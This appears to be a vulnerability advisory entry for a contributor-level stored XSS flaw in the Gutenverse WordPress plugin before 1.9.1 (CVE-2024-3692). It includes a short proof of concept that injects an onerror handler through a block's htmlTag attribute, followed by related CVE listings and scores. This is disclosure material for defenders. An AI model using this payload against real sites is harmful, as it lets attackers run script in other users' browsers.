Lucene search
Dmtirii IgnatyevWPEX-ID:6F100F85-3A76-44BE-8092-06EB8595B0C9HistoryApr 12, 2024 - 12:00 a.m.
Gutenverse < 1.9.1 - Contributor+ Stored XSS
2024-04-1200:00:00
Dmtirii Ignatyev
20
gutenverse
contributor+
stored xss
update
Description The plugin does not validate the htmlTag option in various of its block before outputting it back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below code in a post when in Code Editor Mode:
<!-- wp:gutenverse/post-title {"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"} -->
<div class="guten-element guten-post-title guten-sw5SZ2"></div>
<!-- /wp:gutenverse/post-title -->
The XS will be triggered when any user will (pre)view the postReferences
Related
cve
cve
CVE-2024-3692
2024-05-03 06:15:14
nvd
nvd
CVE-2024-3692
2024-05-03 06:15:14
wpvulndb
wpvulndb
Gutenverse < 1.9.1 - Contributor+ Stored XSS
2024-04-12 00:00:00
cvelist
cvelist
CVE-2024-3692 Gutenverse < 1.9.1 - Contributor+ Stored XSS
2024-05-03 06:00:02
wordfence
wordfence
6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:6F100F85-3A76-44BE-8092-06EB8595B0C9